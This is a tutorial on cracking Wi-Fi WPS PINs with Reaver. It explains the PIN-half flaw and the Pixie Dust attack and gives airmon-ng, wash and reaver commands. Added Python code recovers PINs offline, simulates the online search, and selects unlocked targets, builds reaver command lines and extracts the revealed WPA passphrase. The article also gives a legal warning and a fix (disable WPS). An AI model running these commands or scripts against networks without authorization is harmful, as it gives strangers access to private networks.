
Brute-Forcing WPS Pins with Reaver in Linux

Last Updated : 08 Sep, 2023

Reaver is a free and open-source tool for recovering the WPS PIN of a wireless access point by brute force. It does not need the network's WPA passphrase: it impersonates a WPS external registrar and runs the WPS registration protocol (messages M1 to M8) against the AP over and over, once per PIN guess. The flaw it exploits is in the protocol design itself. The AP only continues the exchange past M4 if the first four digits of the guessed PIN are correct, and past M6 if the remaining digits are also correct; otherwise it answers with a NACK. Each response therefore tells the attacker whether one half of the PIN was right.

A WPS PIN is eight decimal digits, and the eighth digit is a checksum of the other seven. Because the halves are confirmed separately, the attacker needs at most 10,000 guesses for the first half and 1,000 for the second, about 11,000 attempts in total instead of the 10^8 that an eight-digit PIN suggests. Reaver walks through these candidates in order, saving its progress in a session file so an interrupted run can be resumed, until the AP accepts a PIN.

On success the AP hands over its current configuration in M7, which is how Reaver prints the network's WPA passphrase as well as the PIN. The whole attack runs over the air without ever associating with the network using the real passphrase.

What is WPS?

Wi-Fi Protected Setup (WPS) is a security standard that allows you to connect devices to a wireless network without having to enter a long, complex password. WPS was created to make it easier to set up wireless networks for home users, but it has been criticized for being less secure than traditional methods of authentication.

WPS Attack Algorithm:

There are two main types of WPS attacks: online and offline.

An online attack cracks the PIN by sending guesses to the access point over the air and watching its replies; this is Reaver's default mode. Because the AP confirms each half of the PIN separately, at most about 11,000 guesses are needed, and a run typically takes several hours, longer if the AP rate-limits or locks WPS after repeated failures.

An offline attack needs only a single captured WPS exchange. The best known is Pixie Dust (Dominique Bongard, 2014). In M3 the AP commits to hashes E-Hash1 and E-Hash2 of the two PIN halves, each mixed with a secret nonce (E-S1 and E-S2). On affected chipsets those nonces are predictable, for example always zero, or produced by the same weak generator as the nonce the AP already sent in M1, so the attacker can recompute the hashes for every candidate half and recover the PIN on their own machine in seconds to minutes, with no further traffic to the AP. Reaver runs this attack through pixiewps when started with the -K 1 option.
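The offline case, as an added example that is not part of the original article: a simulation of the Pixie Dust recovery using the WPS spec's own constructions (PSK1/PSK2 are the first 128 bits of HMAC-SHA-256 over each PIN half, E-Hash1/E-Hash2 are HMAC-SHA-256 over nonce, PSK half and both Diffie-Hellman public keys). The AuthKey, PKE and PKR values are made-up constants of the right length, and the nonces are zero as on the vulnerable Ralink chipsets; with real values from a capture the recovery step would be identical.

```python
import hashlib
import hmac

# Constructed example values. In a real capture the attacker (playing the WPS
# registrar, as Reaver does) knows PKE and PKR from M1/M2 and derives AuthKey
# from the Diffie-Hellman exchange because it chose its own private key.
# Lengths match the WPS spec (192-byte public keys, 32-byte AuthKey); the
# byte values are arbitrary.
AUTH_KEY = bytes(range(32))          # hypothetical AuthKey
PKE = b"\x11" * 192                  # AP (enrollee) DH public key, sent in M1
PKR = b"\x22" * 192                  # attacker (registrar) DH public key, sent in M2
ZERO_NONCE = b"\x00" * 16            # E-S1 = E-S2 = 0, as on vulnerable Ralink chipsets


def wps_checksum(first7: str) -> int:
    """Eighth (check) digit of a WPS PIN: weights 3,1,3,1,3,1,3 over the first seven digits."""
    d = [int(c) for c in first7]
    total = 3 * (d[0] + d[2] + d[4] + d[6]) + (d[1] + d[3] + d[5])
    return (10 - total % 10) % 10


def psk_half(auth_key: bytes, half: str) -> bytes:
    """PSK1 / PSK2: first 128 bits of HMAC-SHA-256(AuthKey, PIN half as ASCII)."""
    return hmac.new(auth_key, half.encode("ascii"), hashlib.sha256).digest()[:16]


def e_hash(auth_key: bytes, e_s: bytes, psk: bytes, pke: bytes, pkr: bytes) -> bytes:
    """E-Hash1 / E-Hash2 = HMAC-SHA-256(AuthKey, E-S || PSK || PKE || PKR)."""
    return hmac.new(auth_key, e_s + psk + pke + pkr, hashlib.sha256).digest()


def ap_m3(auth_key, pin, e_s1, e_s2, pke, pkr):
    """What a WPS-enabled AP (the enrollee) commits to in M3, before seeing any proof from the registrar."""
    return (e_hash(auth_key, e_s1, psk_half(auth_key, pin[:4]), pke, pkr),
            e_hash(auth_key, e_s2, psk_half(auth_key, pin[4:]), pke, pkr))


def pixie_dust(auth_key, e_hash1, e_hash2, e_s1, e_s2, pke, pkr):
    """Recover the PIN offline once E-S1/E-S2 are known: at most 10^4 + 10^3 HMACs."""
    first = next((f"{i:04d}" for i in range(10_000)
                  if e_hash(auth_key, e_s1, psk_half(auth_key, f"{i:04d}"), pke, pkr) == e_hash1),
                 None)
    if first is None:
        return None
    for j in range(1_000):
        second = f"{j:03d}"
        second += str(wps_checksum(first + second))   # only checksum-valid PINs exist
        if e_hash(auth_key, e_s2, psk_half(auth_key, second), pke, pkr) == e_hash2:
            return first + second
    return None


def demo(secret_pin: str = "12345670") -> str:
    """Simulate capturing M3 from an AP with zeroed nonces, then crack the PIN offline."""
    h1, h2 = ap_m3(AUTH_KEY, secret_pin, ZERO_NONCE, ZERO_NONCE, PKE, PKR)
    return pixie_dust(AUTH_KEY, h1, h2, ZERO_NONCE, ZERO_NONCE, PKE, PKR)


if __name__ == "__main__":
    print("recovered PIN:", demo())
```

Note that the second-half search only tries the 1,000 checksum-valid candidates; a PIN whose last digit is not the correct checksum cannot exist on a conforming AP, and the search returns None for it rather than guessing.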

What is Brute Force Attack?

A brute force attack is a method of trying every possible combination of characters until the correct one is found. This can be used to crack passwords, PINs, and other security measures.

For example, if an attacker wants to gain access to a computer system, they might try to brute-force the password by entering every possible combination of letters, numbers, and symbols until they find the correct one. This can be a very time-consuming process, but it is possible if the attacker has enough time and resources.

Brute-forcing a WPS PIN means trying candidate PINs until the access point accepts one. Naively an eight-digit PIN has 10^8 possibilities, but the checksum digit removes a factor of ten and the protocol confirms the two halves separately, so an attacker needs at most 10,000 + 1,000 = 11,000 attempts. That is enough to gain access to any Wi-Fi network that has WPS PIN authentication enabled and does not lock WPS after repeated failures.

WPS (Wi-Fi Protected Setup) lets a user add a device by entering a PIN instead of the network passphrase. Because of the weakness above, a WPS PIN can be brute-forced in hours with a tool such as Reaver, and once the PIN is accepted the AP hands over the real WPA passphrase.
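The two-stage online search described above, as an added example that is not part of the original article. The access point is a constructed model that answers M4 with M5 only when the first PIN half is right and M6 with M7 only when the whole PIN is right, and that locks WPS for a while after ten consecutive failures, as many APs now do; the attacker waits out the lock the way Reaver does. The attempt count it returns is what a real run would need for the same PIN.

```python
def wps_checksum(first7: str) -> int:
    """Eighth (check) digit of a WPS PIN: weights 3,1,3,1,3,1,3 over the first seven digits."""
    d = [int(c) for c in first7]
    total = 3 * (d[0] + d[2] + d[4] + d[6]) + (d[1] + d[3] + d[5])
    return (10 - total % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True for an 8-digit PIN whose last digit is the correct checksum."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(pin[:7])


class SimulatedAP:
    """Constructed model of a WPS-enabled AP acting as the WPS enrollee.

    It answers the registrar's M4 with M5 only if the first PIN half is right and
    M6 with M7 only if the full PIN is right; otherwise it sends a NACK. A real AP
    leaks the same bit through its check of R-Hash1/R-Hash2. After `lock_after`
    consecutive failures it locks WPS for `lock_ticks` ticks of simulated time.
    """

    def __init__(self, pin: str, lock_after: int = 10, lock_ticks: int = 60):
        assert is_valid_pin(pin), "a conforming AP only has checksum-valid PINs"
        self.pin = pin
        self.lock_after, self.lock_ticks = lock_after, lock_ticks
        self.failures = self.locked_for = self.attempts = 0

    def tick(self) -> None:
        """Simulated time passing while the attacker waits for the lock to expire."""
        if self.locked_for > 0:
            self.locked_for -= 1

    def _fail(self) -> str:
        self.failures += 1
        if self.failures >= self.lock_after:
            self.locked_for, self.failures = self.lock_ticks, 0
        return "NACK"

    def try_m4(self, first_half: str) -> str:
        if self.locked_for:
            return "LOCKED"
        self.attempts += 1
        if first_half == self.pin[:4]:
            self.failures = 0
            return "M5"
        return self._fail()

    def try_m6(self, first_half: str, second_half: str) -> str:
        if self.locked_for:
            return "LOCKED"
        self.attempts += 1
        if first_half + second_half == self.pin:
            self.failures = 0
            return "M7"
        return self._fail()


def _send(ap: SimulatedAP, fn, *args):
    """Retry a message while the AP reports a WPS lock; returns (reply, ticks waited)."""
    waited = 0
    while True:
        reply = fn(*args)
        if reply != "LOCKED":
            return reply, waited
        ap.tick()                      # Reaver: "Detected AP rate limiting, waiting ..."
        waited += 1


def online_bruteforce(ap: SimulatedAP) -> dict:
    """Reaver's order: all 10^4 first halves, then the 10^3 checksum-valid second halves."""
    ticks = 0
    first = None
    for i in range(10_000):
        reply, waited = _send(ap, ap.try_m4, f"{i:04d}")
        ticks += waited
        if reply == "M5":
            first = f"{i:04d}"
            break
    if first is None:
        return {"pin": None, "attempts": ap.attempts, "ticks": ticks}
    for j in range(1_000):
        second = f"{j:03d}"
        second += str(wps_checksum(first + second))
        reply, waited = _send(ap, ap.try_m6, first, second)
        ticks += waited
        if reply == "M7":
            return {"pin": first + second, "attempts": ap.attempts, "ticks": ticks,
                    "worst_case": 10_000 + 1_000, "naive_keyspace": 10 ** 8}
    return {"pin": None, "attempts": ap.attempts, "ticks": ticks}


if __name__ == "__main__":
    print(online_bruteforce(SimulatedAP("12345670")))
```

For the PIN 12345670 the search makes 1,235 attempts on the first half and 568 on the second, 1,803 in total; the lockouts add waiting time but not attempts, which is why a locking AP slows Reaver down without changing how many guesses it needs.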

Features of Reaver:

1. WPS PIN Recovery

2. Automated Brute-Force

3. Pixie Dust Attack Support

4. Advanced Configuration Options

5. Status Monitoring

Brute-Forcing WPS Pins with Reaver in Linux

Reaver is preinstalled on Kali Linux and similar security distributions; the version shipped is the actively maintained reaver-wps-fork-t6x, which also provides the wash scanner used below. On other distributions it is usually available from the package manager, for example sudo apt install reaver on Debian-based systems. You also need the aircrack-ng suite for airmon-ng and a wireless adapter whose driver supports monitor mode and packet injection.


Step 1: First put the wireless interface into monitor mode. Type the following command in the terminal (wlan0 is the interface name; check yours with iw dev).

sudo airmon-ng start wlan0


Once this completes, wlan0 is in monitor mode under a new interface name, wlan0mon. If the interface keeps dropping out of monitor mode, run sudo airmon-ng check kill first to stop NetworkManager and wpa_supplicant, which otherwise reset it.

Step 2: Now scan for access points that have WPS enabled and not locked. Type the following command to do so.

sudo wash -i <interface>


Note: wlan0mon is the wireless interface which is in monitor mode.

wash lists every AP that advertises WPS, with its BSSID, channel, signal strength, WPS version and whether WPS is currently locked (the Lck column). Only unlocked APs are worth attacking; a locked AP refuses PIN attempts until its lock expires.

Step 3: Copy the BSSID, and note the channel, of the AP whose WPS PIN you want to crack.

Step 4: Type the following command to run reaver and list all of its options.

reaver -h


Step 5: Type the following command to start brute-forcing the WPS PIN with Reaver.

sudo reaver -i wlan0mon -b 4C:22:F3:FA:60:9D -S -v


-i – The monitor-mode interface to use.

-b – The BSSID of the target AP.

-S – Use small Diffie–Hellman keys so each attempt is computed faster. If Reaver never gets past M2 with this option, try again without it.

-v – Verbose: display non-critical warnings. Use -vv or -vvv for more detail.

Adding -c with the channel shown by wash stops Reaver from channel-hopping while it works.

Reaver now works through the candidate PINs, reporting its progress as a percentage and the time per attempt. If the AP locks WPS, Reaver reports the rate limiting and waits before continuing; the -l (--lock-delay) option sets how long it waits. When the AP accepts a PIN, Reaver prints the WPS PIN, the WPA PSK the AP delivered in M7 and the SSID, and exits. You can then join the network with that passphrase, or reuse the PIN with any WPS client for as long as the AP keeps it.
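Steps 2 to 5 above as one small helper, added here as an example and not part of the original article or of the Reaver project: it parses the output of wash in the column layout of reaver/wash 1.6.x to pick unlocked WPS targets, builds the matching reaver command line (with -c so Reaver stays on the right channel), and pulls the PIN and passphrase out of Reaver's result lines. The wash and Reaver output embedded below is constructed; the first BSSID is the one used in the article, the other two are made up.

```python
import re
from typing import Dict, List

# Constructed sample of `wash -i wlan0mon` output (reaver/wash 1.6.x column layout).
WASH_OUTPUT = """\
BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------------------------------
4C:22:F3:FA:60:9D    6  -45  2.0  No   RalinkTe  TestLab
AA:BB:CC:DD:EE:01   11  -70  1.0  Yes  Broadcom  Guest Net
AA:BB:CC:DD:EE:02    1  -60  2.0  No   AtherosC  Office
"""

# Constructed sample of the lines Reaver prints when a PIN is accepted.
REAVER_OUTPUT = """\
[+] Trying pin "12345670"
[+] Sending M6 message
[+] Received M7 message
[+] WPS PIN: '12345670'
[+] WPA PSK: 'CorrectHorseBatteryStaple'
[+] AP SSID: 'TestLab'
"""

BSSID_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")
RESULT_RE = re.compile(r"^\[\+\] (WPS PIN|WPA PSK|AP SSID): '(.*)'$")
RESULT_KEYS = {"WPS PIN": "pin", "WPA PSK": "psk", "AP SSID": "ssid"}


def parse_wash(text: str) -> List[Dict]:
    """One dict per AP row; header, separator and malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split(None, 6)            # ESSID may contain spaces: keep the tail whole
        if len(parts) < 7 or not BSSID_RE.match(parts[0]):
            continue
        bssid, ch, dbm, wps, lck, vendor, essid = parts
        rows.append({"bssid": bssid.upper(), "channel": ch, "dbm": int(dbm),
                     "wps": wps, "locked": lck.lower() == "yes",
                     "vendor": vendor, "essid": essid})
    return rows


def select_targets(rows: List[Dict], min_dbm: int = -75) -> List[Dict]:
    """Unlocked WPS APs with a usable signal, strongest first."""
    usable = [r for r in rows if not r["locked"] and r["dbm"] >= min_dbm]
    return sorted(usable, key=lambda r: r["dbm"], reverse=True)


def reaver_argv(iface: str, target: Dict, pixie_dust: bool = False) -> List[str]:
    """Command line for the article's attack; -K 1 adds the offline Pixie Dust attempt."""
    argv = ["reaver", "-i", iface, "-b", target["bssid"],
            "-c", target["channel"], "-S", "-v"]
    if pixie_dust:
        argv += ["-K", "1"]
    return argv


def parse_reaver_result(text: str) -> Dict[str, str]:
    """Extract PIN, WPA passphrase and SSID from Reaver's success lines."""
    found = {}
    for line in text.splitlines():
        m = RESULT_RE.match(line)
        if m:
            found[RESULT_KEYS[m.group(1)]] = m.group(2)
    return found


if __name__ == "__main__":
    for t in select_targets(parse_wash(WASH_OUTPUT)):
        print(" ".join(reaver_argv("wlan0mon", t)))
    print(parse_reaver_result(REAVER_OUTPUT))
```

Run against real output by piping wash into the parser (for example capturing a few seconds of sudo wash -i wlan0mon) and handing the chosen argv to subprocess with sudo prepended; the argv is built as a list on purpose so that an SSID containing shell metacharacters never reaches a shell.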

Here are some of the things to keep in mind when using Reaver:

  • Reaver can only be used against APs that have WPS enabled; WPS-less networks, and APs where only the push-button method is active, are not affected.
  • Reaver is a brute-force attack: even with the 11,000-attempt ceiling, a run usually takes several hours, and an AP that rate-limits or locks WPS can stretch that to days.
  • Many APs detect repeated failures and lock WPS for a period; Reaver reports this and waits, but some APs stay locked until they are rebooted.
  • Attacking an AP you do not own or have written permission to test is illegal in most jurisdictions.

Conclusion:

Reaver is a powerful tool for testing Wi-Fi networks by exploiting the design flaw in Wi-Fi Protected Setup (WPS) PIN authentication. It is valuable for authorized assessments and research, but it must be used responsibly and only against networks you own or are permitted to test. Its release in 2011 was meant to demonstrate the WPS flaw and push vendors and users toward safer configurations. The defence is straightforward: disable WPS on the router, or at least its PIN method, and protect the network with WPA2-PSK or WPA3 and a strong passphrase. A strong passphrase on its own is not enough, because a successful PIN attack hands the passphrase over. After changing the setting, confirm it with wash: a correctly configured AP no longer appears in its output.
